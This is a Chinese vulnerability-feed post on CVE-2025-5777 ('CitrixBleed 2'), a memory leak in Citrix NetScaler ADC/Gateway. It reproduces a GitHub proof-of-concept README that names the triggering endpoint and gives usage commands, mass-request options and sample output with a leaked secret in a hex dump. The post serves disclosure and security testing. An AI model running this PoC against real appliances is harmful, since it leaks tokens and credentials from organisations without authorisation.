Citrix NetScaler Memory Leak Vulnerability

漏洞信息

漏洞名称: Citrix NetScaler Memory Leak Vulnerability

漏洞编号:

  • CVE: CVE-2025-5777

漏洞类型: 信息泄露

漏洞等级: 高危

漏洞描述: Citrix NetScaler ADC/Gateway是一款广泛使用的企业级网络应用交付控制器和网关设备,用于优化和加速应用程序交付,同时提供安全性和可靠性。该设备通常部署在企业网络边缘,作为关键的网络基础设施组件。此次发现的CVE-2025-5777漏洞,被戏称为CitrixBleed 2,是一种信息泄露漏洞,通过特定的HTTP端点/p/u/doAuthentication.do触发内存泄漏,导致未初始化的内存数据被泄露。这些数据可能包含敏感的XML片段、令牌甚至凭证信息。漏洞的技术根源在于处理特定请求时,未能正确初始化或清除内存中的数据,从而导致敏感信息泄露。这种漏洞的存在使得攻击者可以在不需要认证的情况下,远程获取到敏感信息,进而可能被用于进一步的攻击,如身份伪造、数据窃取等。由于Citrix NetScaler ADC/Gateway的广泛使用,此漏洞的影响范围较大,可能对依赖这些设备的企业和组织构成严重威胁。

产品厂商: Citrix

产品名称: Citrix NetScaler ADC/Gateway

来源: https://github.com/0xgh057r3c0n/CVE-2025-5777

类型: CVE-2025:github search

仓库文件

  • .gitignore
  • CVE-2025-5777.py
  • CVE-2025-5777.yaml
  • LICENSE
  • README.md

来源概述

CVE-2025-5777 - Citrix NetScaler Memory Leak PoC

📌 Description

This script exploits a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway appliances, identified as CVE-2025-5777 (dubbed CitrixBleed 2). It triggers a memory leak through the /p/u/doAuthentication.do endpoint, revealing uninitialized memory containing sensitive data such as XML fragments, tokens, and potentially credentials.

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ Impact: Information Disclosure
  • 🧑‍💻 Author: [0xgh057r3c0n]
  • 🧵 Concurrency: Asynchronous with aiohttp
  • 📦 Dependencies: aiohttp, colorama

🚀 Features

  • Asynchronous mass-request engine using asyncio + aiohttp
  • Hex dump of leaked memory fragments
  • Auto-detection of the <InitialValue> memory leak
  • Verbose mode for debugging and response preview
  • Graceful interrupt handling (Ctrl+C)

🧪 Usage

1
python3 CVE-2025-5777.py http://<target> [options]

🔧 Options

Option Description
-v, --verbose Enable verbose debug output
-p <proxy> Use HTTP proxy (e.g., http://127.0.0.1:8080)
-t <threads> Number of concurrent requests (default: 10)

📥 Example

1
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 Sample Output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...

⚠️ Disclaimer

This proof-of-concept is intended for educational and authorized security testing only.
Unauthorized scanning or exploitation of systems you don’t own is illegal.

Github Poc
#CVE-2025:github search #信息泄露
Citrix NetScaler Memory Leak Vulnerability
http://example.com/2025/07/10/github_4229579416/
作者
lianccc
发布于
2025年7月10日
许可协议